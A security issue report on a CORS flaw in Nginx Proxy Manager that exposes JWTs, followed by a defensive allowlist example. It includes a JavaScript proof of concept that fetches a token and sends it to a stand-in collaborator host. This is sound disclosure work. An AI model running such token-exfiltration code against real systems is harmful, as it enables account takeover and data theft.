
[Security] Critical Token Theft Vulnerability in Nginx Proxy Manager v2.12.3 Leads to ATO via CORS Misconfiguration #4509

Open
JFOZ1010 opened this issue Apr 27, 2025 · 0 comments
Vulnerability Summary:

A CORS misconfiguration in Nginx Proxy Manager v2.12.3 allows unauthorized domains to access sensitive data, particularly JSON Web Tokens (JWT). This issue arises due to improper validation of the Origin header, allowing malicious third-party websites to intercept sensitive tokens sent by the server, leading to potential account takeover and unauthorized access to sensitive data.

Impact:

This vulnerability allows an attacker to redirect the authentication token to their own server by exploiting the lack of proper CORS validation. This can be done using a simple browser script, which redirects the token from the vulnerable endpoint /api/tokens to a Burp Collaborator server. Once the attacker captures the token, they can use it to perform unauthorized actions within the application, leading to the following potential consequences:

  1. Unauthorized access to the application by stealing user tokens.
  2. Data leakage, exposing sensitive user data.
  3. Service disruption, if the attacker escalates the access.
  4. Loss of confidentiality, as attackers can impersonate legitimate users.

Steps to Reproduce:

  • POST /api/tokens HTTP/1.1

Image

and we can see how the response returned the JWT token with the Access-Control-Allow-Origin: http://r6y0zdqpcyb8hp3qf1fj1rr29tfk3cr1.oastify.com right?

  • Exploit (JavaScript script): A simple script can be executed in the browser's console to steal the JWT token and send it to a Burp Collaborator server or Evil Domain:

Image

  • The exploit that I've created is this:
const apiUrl = 'http://localhost:81/api/tokens';
const collaboratorUrl = 'http://BURP-COLLAB.com/'; // Burp Collaborator URL or evil domain

const headers = {
  'Content-Type': 'application/json',
  'Authorization': 'Bearer null',
  'Origin': collaboratorUrl, // Use Burp Collaborator as Origin
  'Referer': 'http://localhost:81/login',
};

const body = {
  "identity": "[email protected]",
  "secret": "admin123"
};

// Sending the request to get the token
fetch(apiUrl, {
  method: 'POST',
  headers: headers,
  body: JSON.stringify(body),
  credentials: 'include' 
})
.then(response => response.json())
.then(data => {
  // Sending the token to Burp Collaborator
  fetch(collaboratorUrl + '?token=' + encodeURIComponent(data.token))
    .then(() => console.log('Token sent to Burp Collaborator'))
    .catch(err => console.error('Error sending token to Burp:', err));
})
.catch(error => console.error('Request error:', error));
  • Token Intercepted: The captured token is sent to the Burp Collaborator server and can be used by the attacker to impersonate the user.

Image

  • CORS Vulnerable Endpoints: In addition to /api/tokens, I also discovered similar vulnerabilities in the following endpoints:
      • /api/audit-log
      • /api/nginx/proxy-hosts
      • /api/users

These endpoints could also be exploited in a similar manner due to the misconfiguration.


Conclusion: This vulnerability can be exploited by attackers to steal authentication tokens, leading to a potential account takeover. It poses a significant risk to the confidentiality of the application and the security of users' data. Fixing the CORS misconfiguration is critical to mitigate the risk of unauthorized access.

As a best practice, it is strongly recommended to validate the Origin header properly to ensure that only trusted domains are allowed to interact with sensitive APIs.

Best Regards,
Juan Felipe Osorio Z
Security Researcher
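The report recommends validating the Origin header against trusted domains rather than reflecting it. The following is an added example, not code from the report or from the Nginx Proxy Manager project, contrasting the reflecting pattern with an exact-match allowlist check; the allowed origins and the probe origin are constructed for the demonstration.

```javascript
// Added example (not code from the report or from Nginx Proxy Manager):
// allowlist-based Origin validation for an API that returns tokens.
// The origins below are constructed for the demonstration.
const ALLOWED_ORIGINS = new Set([
  'http://localhost:81',           // admin UI origin used in the report's request
  'https://npm.example.internal',  // hypothetical second trusted origin
]);

// Weak pattern the report describes: reflect whatever Origin the browser sent.
// Any site can then read the JSON body of /api/tokens, token included.
function reflectingCorsHeaders(origin) {
  if (!origin) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Hardened version: emit CORS headers only for an exact allowlist match.
// Parsing with URL rejects "null", malformed values and anything that is not
// a bare scheme://host[:port] serialization, so loose prefix or substring
// matches cannot be satisfied by look-alike hostnames.
function allowlistedCorsHeaders(origin, allowed = ALLOWED_ORIGINS) {
  if (!origin) return {};                  // same-origin or non-browser client
  let parsed;
  try {
    parsed = new URL(origin);
  } catch {
    return {};                             // "null" or garbage: deny
  }
  if (parsed.origin !== origin || !allowed.has(origin)) {
    return {};                             // no ACAO header at all: the browser blocks the read
  }
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',                      // keep caches from serving one origin's answer to another
  };
}

// Would a browser let script running on `origin` read a response carrying these headers?
function browserCanRead(headers, origin) {
  return headers['Access-Control-Allow-Origin'] === origin;
}

const probe = 'http://attacker.example';    // constructed third-party origin
console.log('reflecting :', browserCanRead(reflectingCorsHeaders(probe), probe));    // true
console.log('allowlisted:', browserCanRead(allowlistedCorsHeaders(probe), probe));   // false
```

The same check belongs on every endpoint the report lists, not only /api/tokens, since the allowlist decision is per origin, not per route.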

@JFOZ1010 JFOZ1010 added the bug label Apr 27, 2025